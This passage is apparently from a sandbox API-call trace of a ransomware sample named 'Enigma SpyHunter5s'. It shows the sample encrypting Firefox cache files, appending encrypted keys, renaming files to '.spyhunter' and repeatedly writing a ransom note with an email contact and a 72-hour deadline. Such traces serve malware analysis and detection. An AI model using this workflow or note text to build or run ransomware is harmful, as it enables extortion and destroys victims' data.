pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.spyhunter") returned 119 [0155.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01.spyhunter")) returned 1 [0155.583] GetProcessHeap () returned 0x2c0000 [0155.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.583] GetProcessHeap () returned 0x2c0000 [0155.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.583] GetProcessHeap () returned 0x2c0000 [0155.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbcbe0 | out: hHeap=0x2c0000) returned 1 [0155.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.587] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.587] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb6f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec98, lpOverlapped=0x0 | out: lpBuffer=0x57eb6f*, lpNumberOfBytesWritten=0x57ec98*=0x127, lpOverlapped=0x0) returned 1 [0155.588] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.588] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec98, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec98*=0x2ac, lpOverlapped=0x0) returned 1 [0155.588] CloseHandle (hObject=0xb0) returned 1 [0155.588] GetProcessHeap () returned 0x2c0000 [0155.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f48318 | out: hHeap=0x2c0000) returned 1 [0155.588] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec38 | out: pbBuffer=0x57ec38) returned 1 [0155.588] GetProcessHeap () returned 0x2c0000 [0155.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.588] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec30*=0x30) returned 1 [0155.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.589] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01") returned 109 [0155.589] StrStrW (lpFirst="0B619d01", lpSrch=".txt") returned 0x0 [0155.589] GetProcessHeap () returned 0x2c0000 [0155.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.589] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebf4*=0x2800, lpOverlapped=0x0) returned 1 [0155.621] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.621] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebf4*=0x2800, lpOverlapped=0x0) returned 1 [0155.622] GetProcessHeap () returned 0x2c0000 [0155.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0155.622] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.622] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebf4, lpOverlapped=0x0 | out: lpBuffer=0x57ec34*, lpNumberOfBytesWritten=0x57ebf4*=0x4, lpOverlapped=0x0) returned 1 [0155.623] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebf4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebf4*=0x30, lpOverlapped=0x0) returned 1 [0155.623] CloseHandle (hObject=0xb0) returned 1 [0155.626] GetProcessHeap () returned 0x2c0000 [0155.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.626] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.spyhunter") returned 119 [0155.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01.spyhunter")) returned 1 [0155.628] GetProcessHeap () returned 0x2c0000 [0155.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.628] GetProcessHeap () returned 0x2c0000 [0155.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.628] GetProcessHeap () returned 0x2c0000 [0155.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbcab8 | out: hHeap=0x2c0000) returned 1 [0155.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.629] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.629] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb67*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec90, lpOverlapped=0x0 | out: lpBuffer=0x57eb67*, lpNumberOfBytesWritten=0x57ec90*=0x127, lpOverlapped=0x0) returned 1 [0155.629] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.629] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec90, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec90*=0x2ac, lpOverlapped=0x0) returned 1 [0155.630] CloseHandle (hObject=0xb0) returned 1 [0155.630] GetProcessHeap () returned 0x2c0000 [0155.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f480a8 | out: hHeap=0x2c0000) returned 1 [0155.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.630] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.630] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x57eb63*, lpNumberOfBytesWritten=0x57ec8c*=0x127, lpOverlapped=0x0) returned 1 [0155.631] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.631] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec8c*=0x2ac, lpOverlapped=0x0) returned 1 [0155.631] CloseHandle (hObject=0xb0) returned 1 [0155.631] GetProcessHeap () returned 0x2c0000 [0155.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47f70 | out: hHeap=0x2c0000) returned 1 [0155.632] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec28 | out: pbBuffer=0x57ec28) returned 1 [0155.632] GetProcessHeap () returned 0x2c0000 [0155.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.632] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec20*=0x30) returned 1 [0155.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.632] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01") returned 109 [0155.632] StrStrW (lpFirst="C3B7Bd01", lpSrch=".txt") returned 0x0 [0155.632] GetProcessHeap () returned 0x2c0000 [0155.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.632] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebe4*=0x2800, lpOverlapped=0x0) returned 1 [0155.634] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.634] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebe4*=0x2800, lpOverlapped=0x0) returned 1 [0155.634] GetProcessHeap () returned 0x2c0000 [0155.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0155.634] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.634] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebe4, lpOverlapped=0x0 | out: lpBuffer=0x57ec24*, lpNumberOfBytesWritten=0x57ebe4*=0x4, lpOverlapped=0x0) returned 1 [0155.635] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebe4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebe4*=0x30, lpOverlapped=0x0) returned 1 [0155.635] CloseHandle (hObject=0xb0) returned 1 [0155.635] GetProcessHeap () returned 0x2c0000 [0155.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.635] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.spyhunter") returned 119 [0155.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01.spyhunter")) returned 1 [0155.636] GetProcessHeap () returned 0x2c0000 [0155.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.637] GetProcessHeap () returned 0x2c0000 [0155.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.637] GetProcessHeap () returned 0x2c0000 [0155.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbc868 | out: hHeap=0x2c0000) returned 1 [0155.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.638] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.638] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb5b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x57eb5b*, lpNumberOfBytesWritten=0x57ec84*=0x127, lpOverlapped=0x0) returned 1 [0155.638] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.639] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec84*=0x2ac, lpOverlapped=0x0) returned 1 [0155.639] CloseHandle (hObject=0xb0) returned 1 [0155.639] GetProcessHeap () returned 0x2c0000 [0155.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47e38 | out: hHeap=0x2c0000) returned 1 [0155.639] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec20 | out: pbBuffer=0x57ec20) returned 1 [0155.639] GetProcessHeap () returned 0x2c0000 [0155.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec18*=0x30) returned 1 [0155.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.641] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01") returned 109 [0155.641] StrStrW (lpFirst="B60F3d01", lpSrch=".txt") returned 0x0 [0155.641] GetProcessHeap () returned 0x2c0000 [0155.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0155.641] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ebdc*=0x2800, lpOverlapped=0x0) returned 1 [0155.816] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.816] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ebdc*=0x2800, lpOverlapped=0x0) returned 1 [0155.816] GetProcessHeap () returned 0x2c0000 [0155.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0155.817] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.817] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebdc, lpOverlapped=0x0 | out: lpBuffer=0x57ec1c*, lpNumberOfBytesWritten=0x57ebdc*=0x4, lpOverlapped=0x0) returned 1 [0155.822] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebdc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebdc*=0x30, lpOverlapped=0x0) returned 1 [0155.822] CloseHandle (hObject=0xb0) returned 1 [0155.823] GetProcessHeap () returned 0x2c0000 [0155.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.823] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.spyhunter") returned 119 [0155.823] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01.spyhunter")) returned 1 [0155.824] GetProcessHeap () returned 0x2c0000 [0155.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.824] GetProcessHeap () returned 0x2c0000 [0155.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.824] GetProcessHeap () returned 0x2c0000 [0155.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbc740 | out: hHeap=0x2c0000) returned 1 [0155.824] CryptGenRandom (in: hProv=0x2d5df8, 